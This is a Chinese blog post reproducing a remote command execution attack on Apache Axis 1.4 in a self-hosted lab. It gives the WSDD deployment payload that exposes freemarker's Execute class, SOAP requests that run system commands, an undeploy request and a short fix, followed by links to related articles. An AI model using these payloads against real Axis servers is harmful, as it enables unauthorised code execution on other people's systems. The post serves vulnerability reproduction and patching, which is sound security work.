如何对使用了Axis组件的Java项目进行漏洞利用

最新推荐文章于 2024-08-08 14:33:52 发布
最新推荐文章于 2024-08-08 14:33:52 发布
阅读量1.2k 收藏
点赞数
分类专栏: 实践笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lynnez_dd/article/details/114484905
版权

近期发现一个高级的漏洞利用姿势——对使用了axis组件的Java项目进行远程命令执行。

IDEA+JavaWeb项目(servlet)+axis-bin-1_4.tar.gz+freemarker-2.3.8.jar+阿里云服务器

一、在本地使用IDEA搭建一个简单的JavaWeb项目

1、GitHub下载一个简单的JavaWeb项目CustomerManagement

2、在阿里云上开启一个Tomcat8的docker,将项目文件传输至Tomcat容器中

将项目的CustomerManagement-master/CustomerManagement_for_Eclipse/WebContent目录(jsp文件)拷贝到阿里云上开启的Tomcat目录的tomcat/webapps/目录下,浏览器访问WebContent目录下的任一jsp文件,访问成功则表示该项目部署成功。

二、在JavaWeb项目中引入axis组件

Axis是Apache组织推出的SOAP引擎,Axis项目是Apache组织著名的SOAP项目的后继项目;

当安装好Tomcat以后,只需将下载的Axis软件包解压缩,将其中的“webapps”目录下的“axis”目录整个拷贝到Tomcat安装目录下的“webapps”目录下便可。

启动Tomcat服务器,在浏览器中访问 http://yourIP:8080/axis/happyaxis.jsp,若是页面显示有错误,则须要回头检查一下相关配置是否正确,若是浏览页面能正确显示出系统组件、属性等参数配置信息,则表示安装成功.

下载的freemarker-2.3.8.jar放在axis/WEB-INF/lib目录下

三、Axis服务发布(参考https://www.cnblogs.com/zhuyx/archive/2008/03/03/10401998.html)

Axis提供了两种服务发布方式,一种是即时发布(Instant Deployment),一种是定制发布(Custom Deployment):

(1)使用即时发布首先须要一个实现服务功能的Java源文件,将其扩展名改成.jws(Java Web Service的缩写),而后将该文件放到“……\webapps\axis”目录下便可,每当用户调用这类服务的时候,Axis会自动进行编译;

(2)将Java源文件编译成.class文件,放置到“……\webapps\axis\samples\capacity”目录下,不须要构建.jws文件,但必须建立服务发布描述文件deploy.wsdd(Web Service Deployment Descriptor的缩写),这个文件负责描述服务的名称、入口等信息,将该文件也放到“……\webapps\axis\samples\capacity”目录下,而后能够采用Axis提供的一个客户端管理工具——AdminClient来完成服务的定制发布。在“……\webapps\axis\samples\capacity”目录下,运行:

java -cp %AXISCLASSPATH% org.apache.axis.client.AdminClient deploy.wsdd

经过访问 http://yourIP:8080/axis/services/Capacity?wsdl能够看到这个服务的WSDL描述文件,这说明Capacity服务被成功发布了

WEB-INF/web.xml 去掉AdminServlet注释

四、漏洞利用部分

当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,向服务对应的jsp文档里写入shell内容,传入要执行的命令,就可以进行远程命令执行漏洞的利用。

打开axis/WEB-INF/server-config.wsdd,设置AdminService enableRemoteAdmin == True

 

注册服务:

一开始没有

执行命令时需要环境变量找到jar包路径,因此在Tomcat容器中配置环境变量:
vim ~/.profile

export AXIS_HOME=/var/lib/tomcat8/webapps/axis
export AXIS_LIB=$AXIS_HOME/WEB-INF/lib
export AXISCLASSPATH=$AXIS_LIB/axis.jar:$AXIS_LIB/commons-discovery-0.2.jar:$AXIS_LIB/commons-logging-1.0.4.jar:$AXIS_LIB/jaxrpc.jar:$AXIS_LIB/saaj.jar:$AXIS_LIB/log4j-1.2.8.jar:$AXIS_LIB/xml-apis.jar:$AXIS_LIB/xercesImpl.jar:$AXIS_LIB/wsdl4j-1.5.1.jar

source ~/.profile

输入以下内容,创建deploy.wsdd文件,开启RemoteAdmin服务:

<deployment xmlns="http://xml.apache.org/axis/wsdd/"
    xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <service name="AdminService" provider="java:MSG">
    <parameter name="className" value="org.apache.axis.utils.Admin"/>
    <parameter name="allowedMethods" value="*"/>
    <parameter name="enableRemoteAdmin" value="true"/>
  </service>
</deployment>

root@62790cf064c3:/usr/local/tomcat# cd webapps/axis/WEB-INF/

root@62790cf064c3:/usr/local/tomcat/webapps/axis/WEB-INF# ls

attachments  classes  deploy.wsdd  lib users.lst  web.xml

部署刷新配置:

root@62790cf064c3:/usr/local/tomcat/webapps/axis/WEB-INF# java -cp $AXISCLASSPATH org.apache.axis.client.AdminClient deploy.wsdd

log4j:WARN No appenders could be found for logger (org.apache.axis.i18n.ProjectResourceBundle).

log4j:WARN Please initialize the log4j system properly.

Processing file deploy.wsdd

<Admin>Done processing</Admin>

AdminServer注册成功

!--><ns1:deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java" xmlns:ns1="http://xml.apache.org/axis/wsdd/"><ns1:service name="yourName" provider="java:RPC"><ns1:parameter name="className" value="freemarker.template.utility.Execute"/><ns1:parameter name="allowedMethods" value="*"/></ns1:service></ns1:deployment

<ns1:service name="test1Service" provider="java:RPC">
        <ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
        <ns1:parameter name="allowedMethods" value="*"/>
      </ns1:service>

查看server-config.wsdd

调用执行命令:

<?xml version="1.0" encoding="utf-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr">

  <soapenv:Header/>

  <soapenv:Body>

     <exec xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">

        <item>

          <string xsi:type="soapenc:string">calc</string>

        </item>

      </exec>

  </soapenv:Body>

</soapenv:Envelope>

org.apache.axis.client.ServiceFactory下getService服务中进行了context.lookup操作,也就是说我们注册这个方法并调用传递恶意ldap服务即可完成攻击:

<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 href="#id0"/></exec><multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><multiRef xsi:type="soapenc:string">/sbin/ifconfig</multiRef></multiRef></soapenv:Body></soapenv:Envelope>

卸载服务:

host=IP&port=8080&url=/services/AdminService?method=!--><ns1:undeployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java" xmlns:ns1="http://xml.apache.org/axis/wsdd/"><ns1:service name="yourName" provider="java:RPC"><ns1:parameter name="className" value="*"/><ns1:parameter name="allowedMethods" value="*"/></ns1:service></ns1:undeployment&filename=123.jpg

 

 

五、漏洞修复

关闭admin服务即可,具体方法注释掉web-inf/web.xml 里的AdminServlet,然后重启tomcat.

AdminServlet/servlet/AdminServlet

樱桃小丸丸纸
关注
专栏目录
Java安全之Axis漏洞分析
m0_64354070的博客
11-29 2299
Java安全之Axis漏洞分析 0x00 前言 看到个别代码常出现里面有一些Axis组件,没去仔细研究过该漏洞。研究记录一下。 0x01 漏洞复现 漏洞版本axis=<1.4 Axis1.4 freemarker 下载Axis包1.4版本Axis放到tomcat的webapp目录中。freemarker.jar放到Axis的 lib目录下。运行tomcat即可。 WEB-INF/web.xml中将该配置取消注释 <servlet-mapping> &l...
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
m0_59598029的博客
01-24 2698
[图片](https://img-一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
Apache漏洞大全(附修复方法)
最新发布
C233333235的博客
08-08 593
一.文件解析Apache 是世界使⽤排名第⼀的 Web 服务器软件。它可以运⾏在⼏乎所有⼴泛使⽤的计算机平台上,由于其跨平台和安全性被⼴泛使⽤,是最流⾏的 Web 服务器端软件之⼀。一.文件解析漏洞复现环境搭建命令如下打开并访问靶机后,我们上传一个名为1.php.jpg的文件,内容为可以直接上传成功,我们尝试访问后也成功访问然后尝试用蚁剑连接,发现连接成功。
Axis搭建加漏洞RCE(含CVE-2019-0227)
GalaxySpaceX的博客
05-15 2737
Axis漏洞RCE,包含CVE-2019-0227
Axis1.4漏洞,Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException
zhongyi11111111的博客
07-21 2467
Axis1.4漏洞,Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException问题原因解决方案 问题 Caused by: org.apache.axis.AxisFault: java.util.ConcurrentModificationException at org.apache.axis.message.SOAPFaultBuilder.createFault(SOAPFaultBuilder.ja
axis2组件漏洞问题
08-01
推荐版本1.7.5
JAVA上百实例源码以及开源项目源代码
12-11
凯撒加密解密程序 1个目标文件 1、程序结构化,用函数分别实现 2、对文件的加密,解密输出到文件 利用随机函数抽取幸运数字 简单 EJB的真实世界模型(源代码) 15个目标文件 摘要:Java源码,初学实例,基于EJB的真实...
axis 代码jar包
11-06
- Axis-1.4版本可能存在安全漏洞,对于新项目,建议使用更现代的版本,如Axis2,或者考虑采用其他的Web服务框架,如Spring-WS或JAX-WS。 - 确保所有的依赖库都已正确引入,否则可能会出现NoClassDefFoundError等运行...
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2205
0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
axis-ant.jar
01-16
axis-ant.jar
axis2弱密码漏洞复现
信安是不可或缺的一部分!
12-30 4536
介绍 Axis2 Web 管理模块是一个下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 环境介绍 主机
Java axis 配置host_Apache Axis1 与 Axis2 WebService 的漏洞利用总结
weixin_30636329的博客
02-27 1365
作者:Longofo@知道创宇404实验室日期:2021年2月26日Apache Axis分为Axis1(一开始就是Axis,这里为了好区分叫Axis1)和Axis2Axis1是比较老的版本了,在Axis1官方文档说到,Apache Axis1现在已经很大程度被Apache Axis2,Apache CXF和Metro取代,但是,Axis1仍与以下类型的项目相关:需要使用JAX-RPC的项目。该...
Apache axis远程命令执行漏洞预警
systemino的博客
07-08 7068
近日,深信服发现Apache axis 组件远程命令执行漏洞利用方式。该漏洞本质是由于管理员对AdminService配置错误,当enableRemoteAdmin属性设置为true时,攻击者可以远程利用AdminService接口自行发布构造的WebService,再次访问生成的WebService接口时,就可以触发内部引用的类进行远程命令执行漏洞的利用。 axis 组件介绍 axis 全称...
Axis1.4 远程命令执行(CVE-2019-0227)复现
thelostworld
05-12 3674
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。二、影响版本Axis <=1.4三、环境准备方法一:https://mirrors.tuna.tsingh
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现
热门推荐
qq_43697234的博客
07-21 1万+
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现 漏洞产生原因: Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务 影响范围:Axis <=1.4 且enableRemoteAdmin设置为True 环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tom
oracle漏洞poc,Apache Axis 1.4 远程代码执行漏洞(CVE-2019-0227)附PoC
weixin_42107165的博客
04-14 904
漏洞编号和级别CVE编号:CVE-2019-0227,危险级别:高危,CVSS分值:官方未评定受影响的版本Apache Axis Version = 1.4不受影响版本Apache Axis2 所有版本(目前暂时没有发现Axis2的服务存在外联现象)漏洞概述Apache Axis是美国阿帕奇(Apache)软件基金会的一个开源、基于XML的Web服务架构。该产品包含了Java和C++语言实现的SO...
java 远程执行linux命令_Axis1.4 远程命令执行(CVE20190227)复现
weixin_39618456的博客
11-29 134
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏...
使用Axis构建Java SOAP客户端
"本文主要介绍了如何使用Axis构建Java客户端,以进行SOAP协议的通信。Axis是一个开源工具,常用于创建和使用Web服务。在描述中提到了SOAP绑定HTTP的示例,展示了如何向StackQuote服务发送SOAP请求获取股票最新交易...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值